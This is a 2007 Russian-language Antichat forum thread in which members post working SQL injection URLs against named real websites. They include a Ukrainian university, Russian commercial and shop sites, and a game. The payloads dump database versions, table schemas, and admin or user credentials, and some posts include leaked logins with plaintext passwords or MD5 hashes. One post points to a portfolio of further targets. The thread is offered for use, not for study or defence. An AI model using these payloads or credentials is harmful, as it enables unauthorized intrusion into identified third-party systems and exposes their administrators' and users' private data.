HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.11.2007, 23:15
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
С нами: 9892256

Репутация: 62
По умолчанию

donntu.edu.ua - Донецкий национальный технический университет
4.0.24-logCountercounter@localhost.localdomain
Код:
http://donntu.edu.ua/russian/intas/statistics/statistic.php?id=-1)+union+select+1,concat_ws(0x05,version(),database(),user()),3/*
 
Ответить с цитированием

  #2  
Старый 11.11.2007, 01:43
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами: 9881483

Репутация: 569
По умолчанию

Сайты разработки студии 8000.ru


http://piroclub.ru/product_full.php?id=-3068+union+select+1,2,concat(name,0x3a,login,0x3a, password,0x3a,email),4,5+from+users/*&group_id=122
_________________________________

http://www.piro.ru/news_details.php?id=-89+union+select+1,2,concat_ws(0x3a,id,name,login,p assword,email),4,5,6+from+users+limit+0,1/*
_________________________________

http://www.ibercork.ru/news.php?id=-34+union+select+1,2,concat(login,0x3a,pass,0x3a,ip )+from+my8pref_adm_usr+limit+0,1/*
ibercork:ibercork
_________________________________

http://www.gelionn.ru/subcatalog.php?id=-83+union+select+1,concat(table_name,0x3a,column_na me),3+from+information_schema.columns/*
_________________________________
http://www.sbaspect.ru/pages/?parent=37&id=43&sub=-102+union+select+1,concat(login,0x3a,pass,0x3a,ip) +from+my8pref_adm_usr+limit+0,1/*&name=
admin:5c5fd0f154926edd45f17f9e5064940e
sbadmin:123
seo:f2f9364e99cad8adc315a13c2f00a922
 
Ответить с цитированием

  #3  
Старый 11.11.2007, 01:46
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

http://services.rol.ru/portal/site/start/menuitem.85bccd817d90ed8faea08a10b751342c/?articleid=-117+union+select+1,2,3,4,5,6,7+from+users/*
 
Ответить с цитированием

  #4  
Старый 11.11.2007, 01:50
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами: 9881483

Репутация: 569
По умолчанию

продолжение...


http://www.avtovector.ru/service.php?id=-5+union+select+1,table_name+from+information_schem a.tables/*
_________________________________

http://soft.su/?pages_id=4&supplier=-22+union+select+1,2,concat_ws(0x3a,user_login,user _password,user_email),4,5+from+cls_users+limit+1,1/*
админ clite:clite
_________________________________
http://moy-dom.ru/katalog/?action=show_f&id=-3395+union+select+1,2,3,4,table_name,6+from+inform ation_schema.tables/*

_________________________________

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,pass),5,6 ,7,8+from+bestsport_2.my8pref_adm_usr+limit+0,1/*

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,password) ,5,6,7,8+from+users+limit+0,1/*

Последний раз редактировалось fobofob; 11.11.2007 в 13:55..
 
Ответить с цитированием

  #5  
Старый 11.11.2007, 01:54
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами: 9881483

Репутация: 569
По умолчанию

далее...

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat_ws(0x3a,first_name,l ast_name,email,login,password,patronymic),5,6,7,8+ from+bestsport_2.members+limit+0,1/*

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(username,0x3a,user_p assword,0x3a,user_email,0x3a,user_icq),5,6,7,8+fro m+phpbb_pingpong_users+limit+1,1/*

Админ на форуме kungpo:alex5

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,pwd),4,5+f rom+aut_users+limit+2,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,name,login ,password,phone,city,address),4,5+from+book_users+ limit+0,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,e mail),4,5+from+conf_users+limit+0,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,e mail),4,5+from+forum_users+limit+0,1/*

Последний раз редактировалось fobofob; 11.11.2007 в 13:54..
 
Ответить с цитированием

  #6  
Старый 11.11.2007, 02:03
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами: 10787366

Репутация: 2277
По умолчанию

bіgmіr.net

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=25+and+1=1/*'

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78/*'

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,CONCAT_WS(0x3A,VERSION(),USER%20 (),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78/*'


5.0.45-log:mysterygame@localhost:mystery

p.s. бага недавно исправлена

з.з.ы. у меня сегодня 2 года реге на ачате УРЯ!!!

Последний раз редактировалось halkfild; 11.11.2007 в 02:16..
 
Ответить с цитированием

  #7  
Старый 11.11.2007, 02:07
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами: 9881483

Репутация: 569
По умолчанию

Едем дальше...
________________________________

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,login,pass word,pages,info),4,5+from+page_users+limit+0,1/*

________________________________
код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,id,email,passwor d,phone,org,contact,name,occupation,sphere),4,5+fr om+users+limit+0,1/*
________________________________
код:

http://www.superagent.ru/news.php?act=one&nid=-185+union+select+1,2,3,4,concat(table_name,0x3a,co lumn_name)+from+information_schema.columns/* сразу все таблы и колонки.

________________________________
http://www.7000.ru/company/news_details.php?id=-327+union+select+1,2,3,concat_ws(0x3a,email,icq,lo gin,password),5,6+from+7000_stuff_users+limit+0,1/*
________________________________
а это виновник всего

http://www.8000.ru/new.php?otd=dis&idm=14+union+select+1,2,3,4,5,6/*&id=21 вывод в исходнике
Прошу прощения что в несколько постов,иначе не смог-браузер телефона не позволяет
 
Ответить с цитированием

  #8  
Старый 11.11.2007, 02:20
Dark[<X>]D1ablo
Новичок
Регистрация: 21.10.2007
Сообщений: 5
С нами: 9766971

Репутация: 9
По умолчанию

http://www.happyland.ru/brands.php?id=-2+union+select+1,DATABASE(),3,VERSION(),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29/*
дальше не захотел продолжеть с этим ресурсом, так как компания не малая не хочется проблем...



http://www.fostas.ru/library/show_article.php?id=-103+union+select+1,2,database()/*

http://www.t-dsk.ru/index.php?id=-7+union+select+1,database(),3/*

Последний раз редактировалось Dark[<X>]D1ablo; 11.11.2007 в 03:07..
 
Ответить с цитированием

  #9  
Старый 11.11.2007, 02:21
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами: 9881483

Репутация: 569
По умолчанию

Там еще много сайтов которые можно раскрутить на скуль инъекцию
,портфолио главного героя со списком сайтов:
lazarevich.info/portfolio/two/print
 
Ответить с цитированием

  #10  
Старый 11.11.2007, 03:06
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
С нами: 9892256

Репутация: 62
По умолчанию

Астера - коммерческая недвижимость
5.0.45atlanticspbsuatlanticspbsu@81.177.16.61
Код:
http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,version(),database(),user()),2/*
http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),2+from+information_schema.columns+limit+1/*
DB: atlanticspbsu
Код:
analitic_cat
analitic_cat_en
analitic_files
analitic_files_en
category
classes
dictionary
down_categories
down_files
eng_news
estate_cat
estate_contact
estate_descr_en
estate_descr_ru
estate_obj_type
estate_pic
estate_razd_type
estate_region
investment_ru
maillist
maillistt
mainmenu
modules
omenu
prjterms_cat
prjterms_list
projects
projects_area
projects_descr_en
projects_descr_ru
projects_pic
projects_region
realtypic
realtyrent
regions
rus_news
static
users (id,firstname,lastname,user_id,pwd,group_id,status,dt)
users_group_cat (gid,group_name)
DB: atlanticspbsu_1
Код:
CLASSES
DICTIONARY
ELEMENTS
IMAGES
OBJECTS
PAGES
PAGE_INFO
PAGE_PARAMS
PAGE_PARTS
PAGE_PART_INFO
PAGE_PARTS_PARAMS
PARAMS
REVIEWES
SITES
TEMPLATES
TEMPLATE_PARAM_TYPES
Админка тут , а админа пасс ниже...
Код:
http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,user_id,pwd),2+from+users/*
P.S.: Бонус - здесь ...
P.P.S.: Чуть не забыл, результат в title выводится!

Последний раз редактировалось FoxMALDER; 11.11.2007 в 07:38..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.